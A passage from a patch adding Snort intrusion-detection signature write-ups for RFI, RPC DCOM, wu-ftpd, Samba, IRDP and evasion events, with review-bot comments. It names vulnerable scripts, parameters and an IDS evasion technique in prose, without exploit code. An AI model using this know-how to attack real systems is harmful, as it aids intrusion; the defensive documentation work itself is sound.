+All systems running CGI applications using The Edge eCommerce Shop
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
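Review bot: the Impact section ("system integrity compromise", "unauthorized administrative access to the server", "execution of arbitrary code") and the second paragraph of Detailed Information ("execute system binaries or malicious code") are the remote file include boilerplate also used in 100000575.txt and 100000464.txt and overstate a cross site scripting issue in the "cart_id" parameter. The Attack Scenarios paragraph (a malicious link that steals information from the user who clicks it) is the accurate description, so Impact should be rewritten around information theft from the user's browser session rather than server compromise. Also "attackers choosing" should be "attacker's choosing", and the file ends with a stray blank line after the final "--".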
--- /dev/null
+++ b/doc/signatures/3444.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3444
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
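Review bot: "false postives from occuring" should be "false positives from occurring"; the sentence appears twice (Summary and Detailed Information), so fix both. Since the text says the rule only supports other rules, Detailed Information should name which rules depend on it so that an administrator does not disable it when tuning, and Impact could say "NA" like the other non-applicable sections rather than "Unknown."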
--- /dev/null
+++ b/doc/signatures/502.txt
@@ -0,0 +1,71 @@
+Rule:  
+
+--
+Sid:
+502
+
+--
+Summary:
+This event is generated when an IPv4 packet set the strict source record
+route IP option.
+
+--
+Impact:
+Information could be gathered about network topology, and machines
+routing packets onto trusted links could be abused.
+
+--
+Detailed Information:
+Strict source record routing specifies a series of machines which must 
+be exclusively used in the routing of a datagram.  This can be useful to
+map out routes ala the traceroute program by adding discovered 
+intermediary routers one at a time.  Furthermore, while a machine may 
+normally be unreachable due to default gateways, a compliant router can 
+be forced to hand off source routed packets to an intermediary capable 
+of speaking both to the outside world and target machines; the packet 
+may then be forwarded on to its destination.
+
+--
+Affected Systems:
+Any machine fully implementing RFC 791 set up as a router.
+
+--
+Attack Scenarios:
+By incrementing the TTL of successive packets, the topology of routes to
+a host can be determined.  Each compliant node along the way will reply
+with an ICMP Time Exceeded bearing their address and the recorded route.
+
+--
+Ease of Attack:
+Tools are readily available to employ source routing for the purpose of
+network discovery; the bounce attack described is unlikely to surface in
+a properly configured network.
+
+--
+False Positives:
+None
+
+--
+False Negatives:
+Network discovery can be done using other means than source routing.
+
+--
+Corrective Action:
+Redesign network topologies so that routers are kept to a minimum;
+disable routing by other machines.  To prevent network mapping, don't
+allow source-routed packets at all. 
+
+--
+Contributors:
+Snort documentation contributed by by Nick Black, Reflex Security <dank@reflexsecurity.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+IP RFC:
+www.faqs.org/rfcs/rfc791.html
+
+--
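Review bot: "when an IPv4 packet set the strict source record route IP option" in the Summary should read "sets"; the RFC 791 option name is "Strict Source and Record Route", which would be clearer than "strict source record route" throughout. In Detailed Information, "map out routes ala the traceroute program" should be "in the manner of the traceroute program". The Contributors line has "contributed by by Nick Black". The RFC reference "www.faqs.org/rfcs/rfc791.html" lacks the "http://" scheme used elsewhere in this patch.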
--- /dev/null
+++ b/doc/signatures/342.txt
@@ -0,0 +1,62 @@
+SID:
+342
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd on Solaris 8
+
+--
+
+Impact:
+Possible remote execution of commands on the affected server as the root user
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) does not perform proper 
+checking in its SITE EXEC implementation, and allows user input to be 
+sent directly to printf. This allows an attacker to overwrite data and 
+eventually execute code on the server.
+
+--
+
+Affected Systems:
+Any system running wu-ftpd 2.6 .0 or below
+--
+
+Attack Scenarios:
+A remote attacker will attempt to execute commands on the ftp server 
+with root user privileges, over writing or modifying system files. This 
+can be done with anonymous and real user logins.
+--
+
+Ease of Attack:
+Simple, Exploit code exists
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to latest version which has fixes for this problem. Maybe even get rid of wu-ftp with something more secure.
+Restrict access to ftp at the firewall to known hosts only
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
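Review bot: this file uses a different layout from every other file in the patch ("SID:" precedes "Rule:", and the final section is "References:" rather than "Additional References:"); it should follow the common order so the documentation is uniform. The Summary ("a vulnerable ftpd on Solaris 8") conflicts with Detailed Information and Affected Systems, which describe wu-ftpd on any system ("Any system running wu-ftpd 2.6 .0 or below", which also has a stray space in the version). "over writing or modifying system files" should be "overwriting". The Corrective Action tone ("Maybe even get rid of wu-ftp with something more secure.") does not fit the register; suggest "Consider replacing wu-ftpd with a more secure FTP daemon." The Summary, Impact and Corrective Action sentences lack terminal punctuation, and References is empty although Detailed Information identifies a specific SITE EXEC printf issue that has public advisories.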
--- /dev/null
+++ b/doc/signatures/3018.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3018
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
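Review bot: Detailed Information and Attack Scenarios describe the flaw differently: the former says the problem is an integer overflow in memory allocation, the latter says the attacker must "overflow a buffer containing the information for the access control lists"; the scenario should state that the crafted access control list data in the SMB query triggers the integer overflow in the allocation. Also fix "heterogenous" ("heterogeneous") and the missing space in "remote server.The problem". Additional References is empty for an issue with a specific affected version (Samba 3.0.8 and prior); link the Samba advisory or CVE.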
--- /dev/null
+++ b/doc/signatures/363.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+363
+
+--
+Summary:
+This event is generated when an external server sends an ICMP IRDP router advertisement message to an internal server. This may indicate an attempt to cause a denial of service by adding spoofed router information to an IRDP-enabled host's routing table.
+
+--
+Impact:
+Denial of service. 
+
+--
+Detailed Information:
+The ICMP Router Discovery Protocol (IRDP) is enabled by default on some Microsoft Windows and Sun Solaris operating systems. IRDP messages broadcast network routing information, and computers with IRDP enabled will store this routing information in their default routing tables. There is no way to determine whether the IRDP broadcast is authentic or spoofed, and some hosts will use the routes that appear in their local routing tables before using routes discovered via DHCP.
+
+An attacker can exploit this behavior by broadcasting IRDP messages with erroneous routing information to a target network. This will cause some IRDP-enabled hosts on that network to route traffic through the route advertised in the spoofed IRDP message. If the spoofed IRDP message contains nonexistent/inaccessible routing addresses, the target will not be able to connect to external networks, causing a denial of service. This may also facilitate man-in-the-middle attacks or interception of data by an attacker.
+
+Note that if an attacker is on the internal network, he/she can use valid routing addresses in the spoofed IRDP messages to passively monitor other machines or to perform "man-in-the-middle" attacks.
+
+--
+Affected Systems:
+Microsoft Windows 95
+Microsoft Windows 98
+Microsoft Windows 98SE
+Sun Solaris 2.6
+
+--
+Attack Scenarios:
+An attacker crafts spoofed IRDP broadcast messages and forwards them to a target network. If the messages are not filtered by the firewall and are broadcast to the internal network, some IRDP-enabled hosts begin routing traffic through the routes advertised in the IRDP broadcast message, which can cause a denial of service condition.
+
+--
+Ease of Attack:
+Simple. A proof-of-concept exists.
+
+--
+False Positives:
+This rule may generate an alert if legitimate ICMP traffic of type 9 is sent from an external server to an internal server.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+For vulnerable Windows computers, disable IRDP on the system (see http://support.microsoft.com/support/kb/articles/q216/1/41.asp).
+
+For vulnerable Solaris 2.6 computers, install the patch provided by Sun (see http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-access).
+
+Use a packet filtering firewall to block ICMP type 9 packets from entering the internal network.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>.
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0875
+
+Arachnids:
+http://www.whitehats.com/info/IDS174
+
+Bugtraq:
+http://www.securityfocus.com/bid/578
+
+RFC:
+http://www.cotse.com/CIE/RFC/Orig/rfc1256.txt
+
+
+--
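Review bot: Impact lists only "Denial of service.", but Detailed Information also says the spoofed routes "may also facilitate man-in-the-middle attacks or interception of data" and that an internal attacker can "passively monitor other machines"; Impact should include interception of traffic so that it reflects the full description. Otherwise this file is the most complete in the patch (references to CVE, Arachnids, Bugtraq and the RFC) and is a good template for the others.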
--- /dev/null
+++ b/doc/signatures/100000464.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000464
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "LoveCompass AEPartner" application running on a 
+webserver. Access to the file "design.inc.php" using a remote file being passed 
+as the "dir[data]" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "dir[data]" parameter in the "design.inc.php" script 
+used by the "LoveCompass AEPartner" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using LoveCompass AEPartner
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
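Review bot: as in 100000575.txt, the third paragraph of Detailed Information and the Attack Scenarios section are authentication-bypass boilerplate that do not describe the remote file include vector in the Summary; the scenario should describe a request to "design.inc.php" that supplies a URL in the "dir[data]" parameter. Also fix "has been attempted" (redundant after "exploitation attempt"), "running ona web server" ("on a"), and "attackers choosing" ("attacker's choosing"). The file ends with a stray blank line after the final "--".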
--- /dev/null
+++ b/doc/signatures/3219.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3219
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
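Review bot: apart from the Sid, this file is identical to 3176.txt (and the start of 3388.txt below), including the "Expoit code exists." typo and the empty Additional References. If rules 3176, 3219 and 3388 detect different variants of the RPC DCOM issue (different transports or ports, for example), the Summary or Detailed Information of each should say what distinguishes them; otherwise an analyst has no way to tell from the documentation which variant fired.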
--- /dev/null
+++ b/doc/signatures/2421.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2421
+
+--
+Summary:
+This event is generated when an attempt is made to download a file that
+may be an attack vector for a known exploit to a vulnerability in Real 
+Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
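Review bot: Additional References is empty even though the Summary calls this "a known exploit to a vulnerability"; add the RealNetworks advisory and CVE so a reader can confirm which file types and versions the rule covers. The Affected Systems entries "6.0.11 .774" and "6.0.11 .868" contain a stray space inside the version string. "Ease of Attack: Simple." has trailing whitespace and, unlike the other entries in this patch ("Simple. Exploit code exists."), does not say whether exploit code is available; state it either way.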
--- /dev/null
+++ b/doc/signatures/3388.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3388
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
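Review bot: the body of this hunk (Detailed Information, Attack Scenarios, Ease of Attack, Corrective Action) is word-for-word the same as the hunk immediately before it, so the Summary of at least one of the two files should say how the rules differ. The Attack Scenarios text ("a request for a file with an overly long filename via a network share") again does not match the described defect, a malformed DCOM request over RPC; replace it with a scenario that matches. Fix "Expoit" to "Exploit", and fill Additional References with the Microsoft bulletin and CVE that "Apply the appropriate vendor supplied patches" refers to.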
--- /dev/null
+++ b/doc/signatures/1019.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1019
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
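Review bot: Summary and Detailed Information never say what rule 1019 actually matches ("a potential weakness" on IIS); the CGI entries in this patch at least name the script and parameter inspected, so state the request pattern here so an analyst can tell a hit from noise. "Impact: Information gathering possible administrator access." needs punctuation ("Information gathering; possible administrator access."). "Sid: 1019" is on one line followed by two blank lines, while every other file puts the number on the line after "Sid:"; follow the common layout. Additional References is empty.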
--- /dev/null
+++ b/doc/signatures/2045.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+2045
+
+--
+Summary:
+The snmpXdmi daemon is used on Sun Solaris systems to map Simple Network
+Management Protocol (SNMP) management requests to and from the Desktop 
+Management Interface (DMI).
+
+This daemon contains a boundary condition error that could result in a 
+buffer overflow that will present the attacker with super user access to
+the target host.
+
+--
+Impact:
+Complete control of the target machine.
+
+--
+Detailed Information:
+The snmpXdmi daemon is installed and enabled by default on the affected 
+systems below.
+
+DMI is used to manage components on client machines across a network. It
+can be used in conjunction with SNMP via a daemon such as snmpXdmi.
+
+A number of exploits for this vulnerability exist and are in use. The result of a sucessful attack is a complete root compromise of the victim host.
+
+Compromised systems are reported to display a number of commonalities such as:
+
+	A core file for snmpXdmi on /
+	Two instances of inetd running
+	Telnet and SSH backdoors running on high ports
+	An instance of an IRC proxy
+	System binaries replaced by rootkit versions
+	Network sniffers installed
+	Log files changed
+
+The system binaries 'ps' and 'netstat' cannot be trusted to show all 
+running processes since they may have been replaced by rootkit versions 
+specially modified so as to hide evidence of the compromise.
+
+--
+Affected Systems:
+Sun Solaris 2.6, 7.0, 8.0 for SPARC and Intel architectures
+
+--
+Attack Scenarios:
+The attacker must send specially crafted packets to the snmpXdmi daemon 
+or use one of the widely available exploits.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the snmpXdmi service.
+
+Apply the appropriate patches for each affected system.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2417
+
+CERT:
+http://www.cert.org/advisories/CA-2001-05.html
+http://www.kb.cert.org/vuls/id/648304
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0236
+
+--
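Review bot: the Summary section in this hunk describes the snmpXdmi daemon instead of stating what the event indicates ("This event is generated when ..."), and the daemon description is then repeated in Detailed Information; move the description down and make Summary say that the rule detects an attempt to exploit the snmpXdmid buffer overflow. Fix "sucessful" to "successful". The indicators-of-compromise list (core file on /, two inetd instances, backdoors on high ports) is useful but should say where it was reported from, since Additional References only lists the advisories. Check that the CVE link, written in the candidate form "CAN-2001-0236", is the identifier the CERT advisory cites.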
--- /dev/null
+++ b/doc/signatures/100000518.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000518
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHP Live Helper" application running on a 
+webserver. Access to the file "initiate.php" using a remote file being passed 
+as the "abs_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "abs_path" parameter in the "initiate.php" script used 
+by the "PHP Live Helper" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Live Helper
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
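Review bot: the third paragraph of Detailed Information (validating "the credentials of a client host connecting to the services offered on a host server") and the "access an authentication mechanism" Attack Scenario are generic CGI-authentication boilerplate that do not describe a remote file include via the "abs_path" parameter; the same paragraphs recur in the Indexu and Plume CMS entries in this patch. Replace them with an RFI scenario (the attacker passes a URL pointing at a script they control in abs_path, and the server includes and executes it). Fix "ona" to "on a", add the blank line before "--" after "Sid:", "Affected Systems:" and "Contributors:" that the other files have, and fill Additional References with the PHP Live Helper advisory the Corrective Action's "vendor supplied patches" refers to.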
--- /dev/null
+++ b/doc/signatures/111-16.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+111-16
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an IDS evasion attempt.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected a TCP session that contains
+retransimitted data without the necessary retransmission request. This
+may be an attempt to evade any monitoring IDS.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker could supply two packets containing different data, one with
+a malicious payload destined for a vulnerable host and the other with a
+benign payload meant for the IDS. The second packet may disguise itself
+in the session as retransmitted data.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
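Review bot: "retransimitted" should be "retransmitted", and there is a stray blank line between "--" and "Corrective Action:". The Sid "111-16" is a generator:signature pair for the stream4 preprocessor, not a rule SID; say so in the header (GID 111, SID 16) so readers do not look for a rule numbered 16. Corrective Action only says to patch the target host, but the Attack Scenarios paragraph describes an evasion with two different payloads for the same segment; add the operator step of comparing the overlapping segments' payloads and reassembling according to the target host's policy before deciding which copy was delivered.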
--- /dev/null
+++ b/doc/signatures/512.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+512
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to a PC
+running pcAnywhere
+
+--
+Impact:
+Serious. By the very nature of pcAnywhere, without a strong administrative
+password, a successful attack will allow the attacker to gain total 
+control of the machine.
+
+--
+Detailed Information:
+pcAnywhere is a remote control administrative software package produced 
+by Symantec (http://www.symantec.com/pcanywhere/Consumer/features.html) 
+it allows control of a system via network or RAS connection.
+
+--
+Affected Systems:
+	Windows XP Home and Professional
+	Windows 2000 Professional/Server
+	Windows NT Workstation and Server 4.0
+	Windows 98/Me
+
+--
+Attack Scenarios:
+With a copy of pcAnywhere, and attacker can scan a network (port 22) or
+war-dial a series of modems, looking for pcAnywhere signatures.
+
+--
+Ease of Attack:
+Simple. All that is required is an install of pcAnywhere and a host
+to connect to.
+
+--
+False Positives:
+Since pcAnywhere uses the same port as SSH (22) a simple open port scan 
+can show hosts that my not have pcAnywhere installed
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Make sure only servers and workstations that require remote control have
+pcAnywhere installed.
+Make sure that a strong password is required for any level of access, 
+this ideally should be coupled with some for of alternate 
+authentication, such as SecurID, modem callback or be blocked at the 
+external firewall so that the remote control functionality is only 
+available on the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+Symantec PC Anywhere Home Page
+http://www.symantec.com/pcanywhere/Consumer/
+
+RSA:
+RSA SecurID (www.rsasecurity.com/products/securid/)
+
+Arachnids:
+http://www.whitehats.com/info/IDS240
+
+--
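Review bot: False Positives states that pcAnywhere "uses the same port as SSH (22)" and Attack Scenarios says to scan "port 22", but neither gives the transport; if the rule keys on TCP/22 every SSH server on the network will fire it, and if it keys on a UDP port the false-positive claim is wrong. Verify which port and protocol the rule inspects and state it in both places. Typos: "and attacker" -> "an attacker", "my not" -> "may not", "some for of" -> "some form of". The Contributors line has a double space before "Mike Rivett", and the RSA reference lacks the http:// prefix the other links use.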
--- /dev/null
+++ b/doc/signatures/100000610.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000610
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_checkurl.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_checkurl.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
